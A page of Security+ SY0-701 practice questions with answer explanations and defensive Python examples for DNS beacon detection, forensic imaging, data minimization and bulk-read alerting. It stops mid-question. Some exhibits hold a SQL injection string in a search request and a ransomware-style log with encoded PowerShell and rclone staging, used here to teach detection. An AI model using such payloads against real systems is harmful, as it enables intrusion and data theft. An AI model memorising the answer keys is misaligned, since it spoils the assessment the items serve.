Sample questions
Security+ SY0-701 practice questions
An HR analyst must send a salary file to an external auditor. The auditor only needs names, departments, and salary totals, not Social Security numbers or bank account details. Which two actions should the analyst take first? Select two.
- A
Remove unnecessary sensitive fields before sharing
Data minimization reduces exposure by ensuring the auditor receives only the information needed for the stated business purpose.
- B
Use an approved encrypted transfer method
Encryption protects the file while it is being sent, which reduces the chance that an unauthorized party can read it.
- C
Upload the file to a public link and send the URL by email
Why wrong: A public link makes the file easier to access, but it also greatly increases the chance of unauthorized disclosure.
- D
Rename the file to a less obvious name and send it normally
Why wrong: Renaming the file does not protect the contents, so sensitive data is still exposed during transmission and storage.
- E
Save the file locally on a USB drive and hand-deliver it
Why wrong: Physical delivery may seem controlled, but it adds handling risk and does not remove unneeded sensitive data from the file.
An investigator receives a suspect laptop drive that may be used in court. Which approach best supports a forensically sound image while protecting the original media?
- A
Mount the drive read-write so the investigator can browse it quickly.
Why wrong: Read-write mounting risks modifying metadata, timestamps, or file system structures. That weakens the ability to prove the original drive was not altered.
- B
Use a hardware write blocker and create a bit-by-bit forensic image with hashes.
This is the best practice because a hardware write blocker prevents any accidental writes to the source drive, and a bit-by-bit image captures every sector, including unallocated space and slack, for analysis. Hashing the source before acquisition, then hashing the image and the source again afterwards, and confirming all values match provides integrity verification, which is essential when evidence may be challenged later. Together, these steps protect the original media and support chain of custody and courtroom admissibility.
- C
Copy only the user profile folders with a file manager to save time.
Why wrong: A file copy omits slack space, deleted data, and other artifacts that may be crucial in a forensic investigation. It also provides weaker integrity assurance than a complete forensic image.
- D
Boot the laptop normally and use backup software to duplicate the disk.
Why wrong: Booting the system changes the evidence state, and backup software is not the same as forensic acquisition. The goal here is preservation, not convenience.
An investigator must collect data from a suspected insider-threat laptop so the evidence can be used in an HR and legal review. Which action best preserves admissibility?
- A
Boot the laptop normally and browse the user's files for clues
Why wrong: Booting the system normally can change timestamps, modify files, and alter evidence in ways that weaken chain of custody.
- B
Create a forensic image through a write blocker and record hashes before and after acquisition
This is the correct preservation method because it avoids altering the original disk and creates verifiable integrity checks. Using a write blocker prevents writes to the source media, and hashes document that the image matches the evidence. Detailed chain-of-custody records then support admissibility in HR, disciplinary, or legal proceedings.
- C
Copy the user's documents to a USB drive and continue the investigation later
Why wrong: A simple file copy is not a forensic acquisition method and can miss metadata, deleted artifacts, and other important evidence.
- D
Take screenshots of the desktop and delete the original drive contents afterward
Why wrong: Screenshots are only partial evidence, and deleting the original drive would destroy the source material needed for forensic validation.
An NDR tool shows a production web server sending small, periodic DNS queries to random-looking subdomains under a domain the company does not use. The pattern repeats every 60 seconds, even when normal web traffic is idle. What is the best interpretation and next step?
- A
This is normal DNS behavior, so no action is needed unless users report an outage.
Why wrong: The repeated, structured pattern and random-looking subdomains are not typical of normal business DNS activity. Ignoring it could allow continued compromise.
- B
Suspect DNS-based command-and-control, then isolate the server and collect logs and packet data for analysis.
Regular outbound DNS queries to random subdomains can indicate tunneling or command-and-control traffic. The fact that it repeats at a fixed interval strengthens that suspicion. The best next step is to contain the host so the activity cannot continue, while preserving logs and packet captures for investigation. This lets the team determine whether malware, a rogue process, or a misconfiguration is responsible without losing evidence.
- C
Rotate the DNS server’s administrator password and leave the web server online.
Why wrong: Changing a DNS admin password does not address suspicious outbound traffic from the web server itself. The issue is likely on the endpoint or network path.
- D
Assume the web server is performing routine certificate renewal checks and ignore the alert.
Why wrong: Certificate renewal traffic does not usually produce random-looking subdomains at a fixed interval to an unknown domain. That explanation does not fit the pattern well.
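The pattern the NDR flagged above (a fixed interval, random-looking labels, a domain the company does not use) can be scored from plain DNS logs rather than eyeballed. The Python below is an added example written for this page, not a tool from the original material or from any NDR vendor. The log line format, the ten constructed sample lines, the threshold values and the naive "last two labels" registered-domain rule are all assumptions; a production version would use a public-suffix list and tune thresholds against the server's normal DNS baseline.

```python
import math
import re
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample DNS log (not from any real capture).
# Assumed line format: "<epoch_seconds> <client_ip> <query_name>"
SAMPLE_LOG = """\
1700000000 10.20.4.7 www.example.com
1700000000 10.20.4.7 cdn.example.com
1700000000 10.20.4.7 ab3kz9q2.t1.unknown-example.net
1700000060 10.20.4.7 q8vm2xp0.t1.unknown-example.net
1700000120 10.20.4.7 z71kd4wh.t1.unknown-example.net
1700000180 10.20.4.7 m3xq9vkl.t1.unknown-example.net
1700000240 10.20.4.7 r0pl8e2y.t1.unknown-example.net
1700000300 10.20.4.7 hf4b6nc1.t1.unknown-example.net
1700000305 10.20.4.7 mail.example.com
1700000400 10.20.4.7 www.example.com
"""

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)$")


def registered_domain(qname):
    # Assumption: last two labels. Real code should consult a public-suffix list.
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def shannon_entropy(s):
    """Bits per character; encoded payload labels score higher than human-chosen names."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse(log_text):
    """Return (timestamp, source, qname) tuples; malformed lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, qname = m.groups()
            events.append((int(ts), src, qname.lower()))
    return events


def beacon_candidates(events, min_queries=5, min_entropy=2.5, max_jitter=0.2):
    """Score each (source, registered domain) pair on three beaconing signals:
    many distinct subdomains, high entropy in the leftmost label, and a
    near-constant gap between queries (low jitter = stdev / mean interval)."""
    by_pair = defaultdict(list)
    for ts, src, qname in events:
        by_pair[(src, registered_domain(qname))].append((ts, qname))
    findings = []
    for (src, domain), rows in by_pair.items():
        if len(rows) < min_queries:
            continue
        rows.sort()
        labels = [q.split(".")[0] for _, q in rows]
        distinct = len(set(labels))
        ent = mean(shannon_entropy(l) for l in labels)
        gaps = [b[0] - a[0] for a, b in zip(rows, rows[1:])]
        avg_gap = mean(gaps)
        jitter = pstdev(gaps) / avg_gap if avg_gap else 1.0
        if distinct >= min_queries and ent >= min_entropy and jitter <= max_jitter:
            findings.append({"src": src, "domain": domain, "queries": len(rows),
                             "distinct_labels": distinct,
                             "mean_label_entropy": round(ent, 2),
                             "interval_s": float(avg_gap), "jitter": round(jitter, 3)})
    return findings


if __name__ == "__main__":
    for f in beacon_candidates(parse(SAMPLE_LOG)):
        print(f)
```

On the sample data only the unknown-example.net traffic is returned: six distinct eight-character labels, mean entropy 3.0 bits per character, and a 60-second interval with zero jitter. The normal example.com lookups fail the query count and would also fail the entropy test. Treat a hit as a reason to contain and capture, as option B says, not as proof on its own.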
An investigator needs to make a forensic image of a suspect laptop without changing the original drive contents. Which two practices should be used? Select two.
- A
Use a hardware or software write blocker during acquisition
A write blocker prevents the acquisition tool from modifying the source drive.
- B
Record SHA-256 hashes of the source and the image to verify integrity
Matching hashes help prove that the forensic copy is identical to the original evidence.
- C
Mount the drive read/write so hidden files are easier to access
Why wrong: Read/write mounting can alter evidence and defeats the purpose of forensic acquisition.
- D
Defragment the drive first to improve imaging speed
Why wrong: Defragmentation changes the evidence and is inappropriate before imaging.
- E
Install triage tools directly on the suspect laptop
Why wrong: Installing tools on the suspect system modifies it and can contaminate evidence.
An operations team manages Linux servers over SSH. The security team wants to stop direct management access from employee laptops, reduce lateral movement if one admin endpoint is compromised, and keep a log of every administrative session. Which two design choices best fit? Select two.
- A
Require administrators to connect to a bastion host or jump server before reaching the Linux servers.
A bastion host is a hardened choke point for privileged access, so all administrative sessions can be concentrated, filtered, and monitored. It prevents direct SSH exposure from general user systems and gives the security team a single place to enforce logging and session control. This is a common hardened management-path pattern.
- B
Let all corporate laptops connect directly to SSH on the servers if MFA is enabled.
Why wrong: MFA is useful, but direct access from every corporate laptop still expands the attack surface and makes lateral movement much easier after an endpoint compromise. The scenario explicitly asks to stop direct management access and reduce spread, so a central jump path is better than broad direct reachability.
- C
Restrict management interfaces so only the bastion host can reach them and log each session.
Limiting server management interfaces to the bastion host creates a strong network boundary and prevents administrators from bypassing the controlled access path. Session logging provides traceability and supports investigations and accountability. This complements the bastion by ensuring the network architecture enforces the same control model.
- D
Expose SSH to the internet because key-based authentication is already strong.
Why wrong: Publicly exposing SSH is unnecessary and increases brute-force, scanning, and exploitation risk. Key-based authentication helps, but it does not justify direct internet access to management services. The requirement is to remove direct access from employee laptops, not extend management services to untrusted networks.
- E
Use split tunneling for admin traffic so management packets can bypass the VPN.
Why wrong: Split tunneling is generally used to route some traffic outside the secure tunnel, which is the opposite of what this scenario needs. Management traffic should be tightly controlled and inspected, not routed around security controls. Bypassing the VPN would weaken the protected management path.
An investigator needs a copy of a suspect laptop drive for analysis without changing the original media. What should be used?
- A
A simple file copy of the user folder
Why wrong: A file copy does not preserve all metadata, deleted data, or disk structures needed for forensics.
- B
A full forensic image taken with a write blocker
This is the best answer because a forensic image creates a bit-for-bit copy of the drive while a write blocker prevents accidental changes to the original media. That combination preserves evidentiary integrity and allows the investigator to analyze the copy safely. It is the standard approach when the original disk may later be needed in court or for formal review.
- C
A compressed archive of the desktop contents
Why wrong: A compressed archive captures only selected files, not the complete disk state or deleted data.
- D
The original drive mounted normally on the investigator machine
Why wrong: Mounting the original drive normally can alter data and weaken forensic integrity.
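The four forensic imaging questions above all turn on the same procedure: open the source read-only, copy it bit for bit, and hash the source and the image so the copy can be proven identical later. The Python below is an added worked example of that procedure, not code from this page or from any forensic suite. It uses a temporary file as a stand-in for the drive so it runs without real media, assumes the real source would sit behind a hardware write blocker or a read-only mount (the code itself never opens the source for writing), and invents a JSON-lines chain-of-custody log format.

```python
import hashlib
import json
import os
import tempfile
import time

CHUNK = 1024 * 1024  # 1 MiB reads; real acquisitions use larger blocks and handle read errors


def sha256_file(path):
    """Stream a file through SHA-256. The source is only ever opened read-only."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def acquire(source, image, custody_log, examiner):
    """Bit-for-bit copy of `source` to `image` with hashes recorded before and after.

    Four digests are compared: the source before the copy, the bytes seen during
    the copy, the image re-read from disk, and the source again afterwards.
    `verified` is True only when all four match and the byte count equals the
    source size. Every acquisition appends one JSON record to the custody log.
    """
    rec = {"examiner": examiner, "source": source, "image": image,
           "started_utc": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())}
    rec["source_size"] = os.path.getsize(source)
    rec["source_sha256_before"] = sha256_file(source)
    stream = hashlib.sha256()
    copied = 0
    with open(source, "rb") as src, open(image, "wb") as dst:
        for chunk in iter(lambda: src.read(CHUNK), b""):
            dst.write(chunk)
            stream.update(chunk)
            copied += len(chunk)
        dst.flush()
        os.fsync(dst.fileno())  # make sure the image is on stable storage before hashing it
    rec["bytes_copied"] = copied
    rec["stream_sha256"] = stream.hexdigest()
    rec["image_sha256"] = sha256_file(image)
    rec["source_sha256_after"] = sha256_file(source)
    rec["finished_utc"] = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
    rec["verified"] = (rec["source_sha256_before"] == rec["stream_sha256"]
                       == rec["image_sha256"] == rec["source_sha256_after"]
                       and copied == rec["source_size"])
    with open(custody_log, "a") as log:  # append-only: one JSON line per custody event
        log.write(json.dumps(rec) + "\n")
    return rec


def verify_image(image, expected_sha256):
    """Re-run before analysis or court; any drift in the working copy shows up here."""
    return sha256_file(image) == expected_sha256


def demo():
    """Constructed stand-in for a suspect drive: a temp file with 3 MiB of patterned data."""
    workdir = tempfile.mkdtemp(prefix="acq-")
    source = os.path.join(workdir, "suspect_drive.raw")
    with open(source, "wb") as f:
        for i in range(3):
            f.write(bytes([i]) * CHUNK + b"deleted-but-still-on-disk")
    return acquire(source, os.path.join(workdir, "evidence.dd"),
                   os.path.join(workdir, "chain_of_custody.jsonl"), "examiner-01")


def tamper_demo(rec):
    """Append one byte to the image; verification against the recorded hash must now fail."""
    with open(rec["image"], "ab") as f:
        f.write(b"\x00")
    return verify_image(rec["image"], rec["image_sha256"])


if __name__ == "__main__":
    r = demo()
    print(json.dumps(r, indent=2))
    print("after tamper, verified:", tamper_demo(r))
```

The "source after" hash is the check most often skipped in practice; it is what shows the blocker actually held and the source left the bench in the state it arrived. The tamper step illustrates why the hashes, not the image file, are what the custody record has to protect.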
An organization is redesigning its office network. Guest Wi-Fi must reach the internet only, employee laptops need access to internal apps, and a payment-processing system must be separated from general user traffic but still reach one database server. Which design best meets these requirements?
- A
Place all devices on one flat network and rely on host firewalls for isolation.
Why wrong: A flat network may function, but it puts guest, employee, and payment traffic in one broadcast domain, expands the blast radius of any compromise, and offers no enforced isolation; host firewalls alone are inconsistently configured and cannot meet the requirement to separate the payment system from general user traffic.
- B
Create separate VLANs or subnets for guest, user, and payment zones, then filter inter-zone traffic with firewalls or ACLs.
Separate zones with internal filtering limit lateral movement and allow only required flows: the guest zone gets a route to the internet only, the user zone reaches internal applications, and the payment zone is permitted a single flow to the one database server it needs.
- C
Put the payment system in a DMZ and allow direct internet access for database synchronization.
Why wrong: A DMZ is for exposed services, not for systems that should remain internal and restricted.
- D
Use NAT on every endpoint so internal devices cannot be individually identified on the network.
Why wrong: NAT hides addresses, but it does not provide meaningful segmentation or access control.
An online retailer is redesigning its public web application so the web server can receive internet traffic, the application server can only be reached by the web tier, and the database server can only be reached by the application tier. Which placement best supports this design?
- A
Place all three servers on the same private subnet and control access only with strong passwords.
Why wrong: A shared subnet does not enforce tier separation. Strong passwords protect accounts, but they do not prevent a compromised web server from directly reaching the database server on the same network.
- B
Put the web server in a public zone, the application server in a private zone, and the database server in an isolated internal zone.
This tiered placement supports a classic defense-in-depth design. The web server is internet-facing, the application tier is not directly exposed, and the database is placed in the most restricted zone. Network rules then allow only the necessary north-south and east-west traffic between tiers.
- C
Put the database in the public zone so the web tier can query it directly from the internet.
Why wrong: Databases should not be internet-facing in this architecture. Exposing the database directly would greatly increase risk and bypass the intended layered protection between the tiers.
- D
Use a single reverse proxy for all three servers and disable network segmentation to simplify management.
Why wrong: A reverse proxy can help front-end traffic, but it does not replace network segmentation. Disabling segmentation removes the protective boundaries that prevent unnecessary lateral movement between tiers.
An order-entry application must survive a single server failure and continue serving users if the primary site becomes unavailable. Management wants automatic failover, but does not want to pay for fully active production capacity in two regions. Which design is best?
- A
Run one server and keep nightly backups in cloud object storage.
Why wrong: Backups help recovery after loss, but they do not provide automatic service continuity during an outage.
- B
Use two servers in one site behind a load balancer and maintain an asynchronously replicated warm standby site.
This provides local redundancy for server failure and a lower-cost secondary site for failover if the primary site is lost. Because replication is asynchronous, the standby may lag the primary slightly, so the recovery point objective must tolerate losing the most recent transactions; the warm site also needs a tested, automated failover trigger (for example, health-check-driven DNS or global load balancer switching) to satisfy the automatic-failover requirement.
- C
Deploy active-active multi-region capacity with identical production load in both regions.
Why wrong: Active-active meets the availability goal, but it usually costs more than the scenario allows and duplicates production capacity.
- D
Add RAID 1 and a spare power supply to the database server.
Why wrong: These hardware controls improve a single server’s reliability, but they do not address a site outage or application-level failover.
Based on the exhibit, what is the best handling decision for the requested file?
Exhibit
Data request:
- File: customer_export.csv
- Contents: full name, street address, SSN last 4, account balance, support notes
- Requestor: external troubleshooting contractor
Policy excerpt:
- Internal: company staff only
- Confidential: encrypt in transit, approved recipients only
- Restricted: minimize, mask where possible, owner approval required, time-limited access, logged sharing
- Public: may be shared externally without restriction
- A
Share the full file by email as Confidential because only the last four digits of the SSN are included.
Why wrong: Last-four SSN data is still sensitive, and the file also contains address, balance, and support notes that require stronger handling.
- B
Label it Public because the contractor needs the information to troubleshoot effectively.
Why wrong: Business convenience does not change the classification of customer data containing personally identifiable and financial details.
- C
Mark it Internal and place it on the shared project drive for easy access.
Why wrong: Internal sharing is too broad for customer records and does not satisfy the minimization and approval requirements shown in the policy.
- D
Treat it as Restricted, redact unnecessary fields, and provide only the minimum approved dataset through a logged encrypted transfer.
The file contains customer PII, financial information, and case notes, so it should be handled as Restricted rather than merely Confidential. The policy requires minimization, masking where possible, owner approval, time-limited access, and logged sharing. Because the request comes from an external contractor, the organization should provide only the least amount of data needed, with encryption and formal approval.
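Both the salary-file question at the top of this page and the customer_export.csv exhibit above come down to the same mechanics: keep an allow-list of columns, transform anything that must be kept but not revealed, and log what left, for whom, and under whose approval. The Python below is an added example for this page, not code from the source. The sample rows, column names, the HMAC pseudonymization key and the share-record fields are all assumptions; the key in particular would come from a secrets manager in practice, never from source code.

```python
import csv
import hashlib
import hmac
import io
import time

# Constructed sample export with more columns than any one recipient needs.
RAW_CSV = """\
full_name,department,street_address,ssn_last4,bank_account,account_balance,support_notes,salary
Ana Ruiz,Finance,12 Elm St,1234,GB29NWBK60161331926819,8450.10,Reset password twice,91000
Ben Okafor,Engineering,9 Oak Ave,5678,GB94BARC10201530093459,120.00,Asked about invoice,104000
"""

# Assumption for the example only: a real deployment loads this from a secrets manager.
PSEUDONYM_KEY = b"demo-only-rotate-me"


def pseudonymize(value):
    """Keyed, stable token: the recipient can refer back to a record without seeing the name."""
    return hmac.new(PSEUDONYM_KEY, value.encode(), hashlib.sha256).hexdigest()[:12]


def minimize_csv(raw_csv, keep, transforms=None):
    """Return a CSV containing only the allow-listed columns, with per-column transforms.

    Anything not in `keep` never reaches the output, so a column added to the
    source export later cannot leak by default. Missing columns are an error,
    not silently skipped, so a renamed field is noticed before sharing.
    """
    transforms = transforms or {}
    reader = csv.DictReader(io.StringIO(raw_csv))
    missing = [c for c in keep if c not in reader.fieldnames]
    if missing:
        raise KeyError("requested columns not in export: %s" % missing)
    out = io.StringIO()
    writer = csv.DictWriter(out, fieldnames=keep, lineterminator="\n")
    writer.writeheader()
    for row in reader:
        writer.writerow({c: transforms.get(c, lambda v: v)(row[c]) for c in keep})
    return out.getvalue()


def share_record(dataset, requester, purpose, classification, approver=None, ttl_days=7):
    """The log entry the Restricted policy calls for: approval, time limit, hash of what left."""
    if classification == "Restricted" and not approver:
        raise ValueError("Restricted data requires data-owner approval before sharing")
    now = time.time()
    return {
        "dataset_sha256": hashlib.sha256(dataset.encode()).hexdigest(),
        "rows": dataset.count("\n") - 1,
        "columns": dataset.splitlines()[0],
        "requester": requester,
        "purpose": purpose,
        "classification": classification,
        "approved_by": approver,
        "shared_at": now,
        "expires_at": now + ttl_days * 86400,
    }


def auditor_extract():
    """Salary question: names, departments and salary only; SSN and bank fields are dropped."""
    return minimize_csv(RAW_CSV, ["full_name", "department", "salary"])


def contractor_extract():
    """Restricted exhibit: a record handle plus the support notes; address, SSN and balance are dropped."""
    return minimize_csv(RAW_CSV, ["full_name", "support_notes"],
                        transforms={"full_name": pseudonymize})


if __name__ == "__main__":
    print(auditor_extract())
    ds = contractor_extract()
    print(ds)
    print(share_record(ds, "troubleshooting-contractor", "ticket 4821", "Restricted",
                       approver="data-owner@example.com"))
```

The hash in the share record is what lets a later review confirm exactly which dataset was released, and the expiry field is what makes "time-limited access" enforceable by the transfer platform rather than by memory. Encryption in transit is the transfer channel's job and is deliberately not reimplemented here.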
An organization is evaluating a payroll SaaS provider after the procurement team asks for evidence that the vendor's security controls were designed and operating effectively during the past year. Which document should the security team review first?
- A
Memorandum of understanding
Why wrong: An MOU shows an agreement to collaborate, but it does not provide assurance that security controls were operating effectively.
- B
SOC 2 Type II report
A SOC 2 Type II report provides an independent assessment of control design and operating effectiveness over a defined period, typically six to twelve months. A Type I report only attests to control design at a single point in time, so it would not answer the question of whether controls operated effectively during the past year.
- C
Software license agreement
Why wrong: A license agreement governs usage rights for the software, not the effectiveness of the vendor's security controls.
- D
Network diagram of the vendor's data center
Why wrong: A network diagram may help with architecture review, but it does not provide assurance evidence about control performance.
Based on the exhibit, what additional control is the best fit?
Exhibit
Current controls on the finance share:
- SMB signing enabled
- Weekly access review
- Nightly backups to immutable storage
- Antivirus scans at 02:00
Incident: a valid VPN account was used to access 40,000 files in 8 minutes and copy them to a local drive.
Goal: detect unauthorized bulk access quickly before exfiltration completes.
- A
Add file access auditing with alert thresholds forwarded to the SIEM.
Auditing is a detective control that can identify abnormal bulk reads quickly and trigger timely response. Forwarding the events to the SIEM with a threshold (for example, an unusual number of distinct files read by one account within a few minutes) turns the weekly review into near-real-time detection while the copy is still in progress, which is the stated goal.
- B
Increase the backup schedule from nightly to hourly.
Why wrong: More backups help recovery, but they do not detect suspicious file access or exfiltration in real time.
- C
Rename the share to a less obvious name.
Why wrong: Security by obscurity does not detect misuse and does not stop a valid account from accessing files.
- D
Disable SMB signing so the file transfer runs faster.
Why wrong: Disabling signing weakens integrity protections and does not address the core detection gap.
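What the alert threshold in option A looks like as detection logic: a sliding window of distinct files read per account, firing once per burst. This is an added example written for this page, not code from the source and not any particular SIEM's rule syntax. The 40,000-file event stream mirrors the incident in the exhibit but is constructed; the five-minute window, the 500-file threshold, the UNC paths and the JSON event schema are assumptions to be tuned against the share's real baseline.

```python
import json
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

START = datetime(2024, 3, 4, 9, 0, 0)   # constructed timeline start
WINDOW = timedelta(minutes=5)           # assumed tuning value
THRESHOLD = 500                         # distinct files read within WINDOW (assumed)


def sample_events():
    """Constructed audit stream as (timestamp, account, path, action) tuples.

    One VPN account reads 40,000 distinct files in 8 minutes, matching the
    exhibit, while another user does ordinary work on five spreadsheets.
    """
    events = []
    for i in range(40000):
        events.append((START + timedelta(seconds=i * 480 / 40000),
                       "vpn-jdoe", "\\\\fs01\\finance\\q1\\doc%05d.xlsx" % i, "READ"))
    for i in range(30):
        events.append((START + timedelta(minutes=2 * i),
                       "alice", "\\\\fs01\\finance\\budget%d.xlsx" % (i % 5), "READ"))
    events.sort(key=lambda e: e[0])
    return events


def detect_bulk_access(events, threshold=THRESHOLD, window=WINDOW):
    """Count distinct files per account in a sliding time window.

    A Counter per account tracks how many times each path appears inside the
    window, so the distinct-file count is len(counter) and stays O(1) per event.
    One alert is raised per burst; the account re-arms once it drops below threshold.
    """
    recent = defaultdict(deque)      # account -> (ts, path) pairs inside the window
    counts = defaultdict(Counter)    # account -> path -> occurrences inside the window
    armed = defaultdict(lambda: True)
    alerts = []
    for ts, account, path, action in events:
        if action != "READ":
            continue
        dq, ctr = recent[account], counts[account]
        dq.append((ts, path))
        ctr[path] += 1
        while dq and ts - dq[0][0] > window:
            _, old = dq.popleft()
            ctr[old] -= 1
            if ctr[old] == 0:
                del ctr[old]
        distinct = len(ctr)
        if distinct >= threshold and armed[account]:
            armed[account] = False
            alerts.append({"account": account, "at": ts, "distinct_files": distinct,
                           "window_s": window.total_seconds()})
        elif distinct < threshold:
            armed[account] = True
    return alerts


def as_siem_event(alert):
    """One JSON line in the shape a log forwarder would ship to the SIEM (assumed schema)."""
    return json.dumps({"rule": "finance_share_bulk_read", "severity": "high",
                       "account": alert["account"], "timestamp": alert["at"].isoformat(),
                       "distinct_files": alert["distinct_files"],
                       "window_seconds": alert["window_s"]})


if __name__ == "__main__":
    for a in detect_bulk_access(sample_events()):
        print(as_siem_event(a))
```

On the constructed stream the alert fires about six seconds into the burst, at the 500th distinct file, rather than eight minutes later when the copy has finished or a week later at the access review. The threshold should sit well above the busiest legitimate user's five-minute read count so the rule does not page on month-end reporting.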
Based on the exhibit, what is the best next control to prevent noncompliant mobile devices from accessing corporate email while still allowing IT to wipe company data from lost phones?
Exhibit
MDM dashboard excerpt:
- iOS device compliance: 84%
- Android device compliance: 79%
- Email app access policy: Allow if credentials are valid
- Noncompliance reasons: outdated OS, no passcode, jailbreak/root indicators
- Lost device action: Full factory reset only
Security request: Block risky devices from email access and protect employee personal data on BYOD devices.
- A
Enforce conditional access so only compliant MDM-enrolled devices can reach email and enable selective wipe for corporate data.
Conditional access stops noncompliant or compromised devices from using corporate email even if they have valid credentials. Selective wipe is especially important for BYOD because it removes work data without erasing personal content. Together, these controls support both access control and privacy, which is the correct architectural balance for the scenario.
- B
Require users to set a longer password on the email app and keep the current access policy.
Why wrong: A stronger password helps only if the device itself is trustworthy. It does not block rooted, jailbroken, or outdated devices from connecting to the mailbox.
- C
Disable email on all mobile devices and force users to use desktop computers only.
Why wrong: This would be unnecessarily disruptive and does not address the actual security gap in a balanced way. The business requirement still needs mobile access with stronger control.
- D
Rely on a remote full factory reset whenever a device is lost or reported stolen.
Why wrong: A full wipe can erase personal data and creates privacy concerns for BYOD. It also does not stop risky devices from connecting before a loss event occurs.
Based on the exhibit, what is the best response to the facilities manager's request?
Exhibit
Corporate privacy notice excerpt:
- Employee home addresses, personal phone numbers, and emergency contacts are collected for payroll, benefits, tax reporting, and emergency notification only.
- Access is limited to HR and Payroll unless a privacy review approves another purpose.
Ticket:
- Facilities manager requests an export of all employee home addresses and personal phone numbers to mail holiday gifts and parking passes.
- A
Provide the export because the requester is a manager with a legitimate business relationship to employees.
Why wrong: Being a manager does not automatically authorize access to personal data. The exhibit limits use to specific purposes, and this request falls outside them.
- B
Deny the request and direct the manager to use an approved work-contact list or seek privacy review.
The privacy notice clearly limits home addresses and personal phone numbers to defined HR and payroll purposes. The facilities request exceeds that purpose, so the correct action is to deny the export unless a formal privacy review approves another use. Where possible, use a work-contact list that contains less sensitive information.
- C
Send the data to the manager if the manager promises not to share it externally.
Why wrong: A verbal promise does not override the stated purpose limitation or the access restriction in the privacy notice. Personal data handling must follow approved business use, not informal assurances.
- D
Store the export in a shared drive so multiple teams can use it for convenience.
Why wrong: Broader storage would increase exposure and violate the limited-access principle in the exhibit. Convenience is not a valid reason to expand access to personal data.
Before applying a major patch to a virtual machine, the administrator wants a quick way to return the VM to its exact pre-change state if the patch fails. What should the administrator create?
- A
A full backup to removable media
Why wrong: A backup is useful for recovery, but it is slower than a snapshot for rapid rollback.
- B
A snapshot of the virtual machine
A snapshot captures the VM's disk and, optionally, memory state at a specific moment, making rollback fast after a failed patch. A snapshot is not a backup: it depends on the base disk, grows as changes accumulate, and should be deleted or consolidated once the patch is confirmed good.
- C
A separate VLAN for the virtual machine
Why wrong: A VLAN helps network segmentation, but it does not preserve the VM's system state.
- D
A digital certificate for the patch server
Why wrong: Certificates help trust and authentication, but they do not provide restore points for a VM.
Based on the exhibit, what is the best immediate action for the SOC or IR team?
A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.
Exhibit
Host: finance-lap07
10:22:11 winword.exe spawned powershell.exe -enc <redacted>
10:22:14 powershell.exe created C:\Users\ana\AppData\Roaming\rclone.exe
10:24:02 file rename activity: 184 files changed to *.locked
10:24:09 outbound SMB connections to 10.20.4.18 and 10.20.4.19
10:25:01 EDR status: endpoint still connected to corporate VPN
User report: 'My shared files stopped opening and the folder names changed.'
- A
Isolate the host from the network and revoke its remote access to stop further spread.
The workstation shows active compromise with file encryption behavior and outbound lateral movement. Immediate containment should stop additional SMB propagation and protect neighboring systems before deeper analysis begins.
- B
Restore the workstation from backup immediately before preserving any evidence.
Why wrong: Immediate restoration could destroy forensic evidence and does not stop the attacker from continuing lateral movement elsewhere.
- C
Run a vulnerability scan against the subnet to see whether the malware exploited an unpatched service.
Why wrong: That may help later in root cause analysis, but it is not the priority while the compromise is still active.
- D
Notify users to ignore the issue until the next maintenance window because the incident is likely self-limiting.
Why wrong: The logs show ongoing malicious activity, so waiting would increase business impact and spread risk significantly.
Based on the exhibit, what type of web attack is most likely taking place?
Exhibit
Web application log excerpt:
Request: GET /search?q=acme' OR '1'='1'-- HTTP/1.1
Response: 500 Internal Server Error
Database log: syntax error near "OR" at line 1
Developer note: the search feature appends user input directly into the SQL query string without parameterization.
- A
Cross-site scripting, because the input is visible in the URL and causes an error.
Why wrong: Cross-site scripting would involve injecting script content that runs in a browser context. The exhibit shows database syntax errors tied to SQL query construction, not script execution in the client.
- B
SQL injection, because the attacker is manipulating the database query with crafted input.
This is SQL injection because the input includes SQL control characters and logic that alter the intended query. The database error and the developer note about string concatenation confirm that user-supplied data is being inserted directly into SQL without parameterization. That makes the application vulnerable to query manipulation.
- C
Broken authentication, because the application returns a 500 error.
Why wrong: Broken authentication involves weaknesses in login, session handling, or credential verification. A server error after crafted search input does not indicate authentication failure, so this is not the best fit.
- D
Insecure deserialization, because the application is parsing attacker-controlled data.
Why wrong: Insecure deserialization usually involves tampered serialized objects leading to code execution or logic abuse. The log here shows direct SQL syntax manipulation, which is a different attack pattern.
During a disaster recovery test, what is the most important thing to confirm about the backup?
- A
That the backup files exist in storage.
Why wrong: File existence alone does not prove the backup can be used to restore business operations. A backup must also be restorable and usable.
- B
That the data can be restored and is usable after recovery.
The real purpose of a backup is successful recovery. During testing, the team should verify that the data restores correctly and that applications or users can actually use it afterward. This confirms the backup supports business continuity and is not merely sitting in storage as an unreadable copy.
- C
That the backup system uses encryption.
Why wrong: Encryption is important for protection, but it does not prove the backup will restore correctly during an outage. Recoverability is the key test here.
- D
That the backup is stored on tape instead of disk.
Why wrong: The storage medium is not the main concern in a restore test. What matters is whether the backup can be successfully recovered and used.
Based on the exhibit, what wireless threat is most likely occurring?
Exhibit
Wireless scan from the lobby:
SSID: CorpWiFi   BSSID: 18:AA:10:22:44:60   Signal: -78 dBm
SSID: CorpWiFi   BSSID: 7C:22:90:11:33:AA   Signal: -41 dBm
SSID: CorpGuest  BSSID: 18:AA:10:22:44:61   Signal: -79 dBm
User report: "My tablet connected to CorpWiFi automatically, then a sign-in page appeared that looked different from our normal one."
- A
Evil twin access point
Two access points are broadcasting the same SSID, but one has a much stronger signal and triggers a suspicious captive portal. That pattern fits an evil twin access point, which imitates a legitimate network to lure users into connecting. The attacker can then intercept traffic or harvest credentials.
- B
Bluetooth pairing abuse
Why wrong: Bluetooth pairing abuse involves short-range device pairing, not duplicate Wi-Fi SSIDs and captive portals.
- C
NFC skimming
